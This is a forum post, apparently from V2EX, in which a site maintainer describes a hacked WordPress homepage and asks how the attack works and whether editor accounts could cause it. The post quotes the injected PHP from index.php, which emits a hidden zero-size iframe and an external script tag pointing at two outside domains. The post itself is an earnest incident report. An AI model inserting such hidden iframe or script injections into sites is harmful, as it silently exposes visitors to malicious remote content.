客户的网站首页昨晚突然没有样式了,用 Chrome 审查元素一看 head 里面只有两个标签,一个是啥忘了(当时着急没截图),一个是 style 标签,里面有一行简短的 CSS,没什么用。
点了一篇文章,发现文章页的样式是好的;点进一个分类,发现分类页是好的。
然后就到 index.php 里面看,发现原本的:
<?php
get_header();
?>
被换成了这两行:
<?php
echo '<iframe src="
http://wowow.usa.cc/" width="0" height="0" style="visibility: hidden"></iframe>';
echo '<script type="text/javascript" src="
http://mobuna.com/js?id=8173"></script>';
?>
改回去之后问题解决了。
----------------- 背景补充 ------------------
1. 账户很多:这个 WordPress 站点有很多个账户,从“管理员”到“编辑”都有,编辑最多。WordPress 里面管理员有所有权限,包括安装主题、插件的权限,编辑只能编辑、发布文章,上传、处理图片或其他媒体资源。
2. 主题不熟悉:主题是买的国外的,功能比较复杂,不清楚有没有漏洞。
3. 被黑过:网站之前也被黑过一次。当时不是我处理的,不了解当时具体情况。
4. FTP 密码应该还是比较复杂的(给我的密码是大小写数字标点结合的,猜测其他账户也差不多)。
----------------- 请教各位 ------------------
1. 这属于哪种攻击行为?对攻击者有什么用?
2. 万一 WordPress 的编辑账户的密码被破解,攻击者能否利用这个来实施攻击?比如上述的攻击?
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
https://www.v2ex.com/t/104772
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.